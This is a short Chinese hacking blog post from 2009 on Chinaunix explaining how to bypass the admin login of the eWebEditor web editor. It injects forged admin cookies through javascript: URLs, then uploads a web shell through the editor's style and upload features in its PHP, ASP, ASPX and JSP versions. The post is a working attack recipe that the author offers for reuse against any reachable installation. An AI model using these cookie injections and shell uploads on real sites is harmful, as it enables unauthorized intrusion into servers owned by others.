Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3029665
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-06-13 23:35:14

php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));
javascript:alert(document.cookie=”adminpass=”+escape(”admin”));
javascript:alert(document.cookie=”admindj=”+escape(”1″));
后三次回车,

2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
3 后面的利用和asp一样,新增样式修改上传,就ok了
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
哈哈,以后只要ewebeditor的后台可以找到的话,就可以通杀了   所以这个漏洞还是比较酷,建议收藏
阅读(684) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~